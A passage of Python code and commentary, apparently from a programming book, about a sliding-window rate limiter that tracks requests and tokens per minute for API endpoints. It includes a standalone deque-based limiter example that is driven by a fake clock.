            self.requests_last_minute = len(self.request_timestamps)
            self.tokens_last_minute = sum(tokens for _, tokens in self.token_usage_events)

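    def can_handle_request(self, estimated_tokens: int = 1000) -> bool:
        """
        Check if this endpoint can handle a new request.

        Args:
            estimated_tokens: Estimated tokens for the request

        Returns:
            True if the endpoint can handle the request
        """
        with self.lock:
            # Check health status
            if not self.is_healthy:
                return False

            # Refresh the one-minute window first. Without this, the counters
            # only change when a request completes, so an endpoint that hit its
            # limit would keep reporting itself as full.
            one_minute_ago = time.time() - 60
            self.request_timestamps = [
                ts for ts in self.request_timestamps if ts > one_minute_ago
            ]
            self.token_usage_events = [
                event for event in self.token_usage_events if event[0] > one_minute_ago
            ]
            self.requests_last_minute = len(self.request_timestamps)
            self.tokens_last_minute = sum(tokens for _, tokens in self.token_usage_events)

            # Check rate limits
            if self.requests_last_minute >= self.max_requests_per_minute:
                return False

            if self.tokens_last_minute + estimated_tokens > self.max_tokens_per_minute:
                return False

            return True
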
    def get_load_percentage(self) -> Tuple[float, float]:
        """
        Get the current load percentage of this endpoint.

        Returns:
            Tuple of (requests_percentage, tokens_percentage)
        """
        with self.lock:
            requests_percentage = (
                (self.requests_last_minute / self.max_requests_per_minute) * 100
                if self.max_requests_per_minute > 0 else 0
            )
            tokens_percentage = (
                (self.tokens_last_minute / self.max_tokens_per_minute) * 100
                if self.max_tokens_per_minute > 0 else 0
            )

            return (requests_percentage, tokens_percentage)

    def get_metrics(self) -> Dict[str, Any]:
        """
        Get current endpoint metrics.

        Returns:
            Dictionary with endpoint metrics
        """
        with self.lock:
            total_requests = self.success_count + self.error_count
            avg_latency = self.total_latency_ms / self.success_count if self.success_count > 0 else 0
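
The one-minute bookkeeping in `update_metrics` and `can_handle_request` is a sliding-window rate limit. The following is a minimal standalone sketch of that idea, not the book's implementation: the class name `SlidingWindowLimiter`, its methods, and the injectable `clock` parameter are all hypothetical, introduced here so the behaviour can be exercised without waiting a real minute. It uses a `deque` so that expired events are dropped from the front instead of rebuilding the list on every call, and it omits the lock and health tracking for brevity.

```python
import time
from collections import deque
from typing import Callable, Deque, Tuple


class SlidingWindowLimiter:
    """Hypothetical helper: tracks requests and tokens over a rolling window."""

    def __init__(self,
                 max_requests: int,
                 max_tokens: int,
                 window_seconds: float = 60.0,
                 clock: Callable[[], float] = time.monotonic):
        self.max_requests = max_requests
        self.max_tokens = max_tokens
        self.window_seconds = window_seconds
        self.clock = clock  # assumption: injectable so tests can control time
        self.events: Deque[Tuple[float, int]] = deque()  # (timestamp, tokens)
        self.tokens_in_window = 0

    def _prune(self) -> None:
        # Drop events at or before the cutoff, oldest first.
        cutoff = self.clock() - self.window_seconds
        while self.events and self.events[0][0] <= cutoff:
            _, tokens = self.events.popleft()
            self.tokens_in_window -= tokens

    def record(self, tokens_used: int) -> None:
        # Register one completed request and its token usage.
        self._prune()
        self.events.append((self.clock(), tokens_used))
        self.tokens_in_window += tokens_used

    def can_accept(self, estimated_tokens: int) -> bool:
        # Prune before checking so the counters are never stale.
        self._prune()
        if len(self.events) >= self.max_requests:
            return False
        return self.tokens_in_window + estimated_tokens <= self.max_tokens


# Usage with a fake clock held in a one-element list
now = [0.0]
limiter = SlidingWindowLimiter(max_requests=2, max_tokens=1000,
                               clock=lambda: now[0])
limiter.record(400)
limiter.record(400)
print(limiter.can_accept(100))  # False: the request cap of 2 is reached

now[0] = 61.0
print(limiter.can_accept(100))  # True: both events have aged out of the window
```

Pruning inside `can_accept` is the important design choice: an endpoint that has hit its limit receives no further traffic, so a window that is refreshed only when a request completes would never drain.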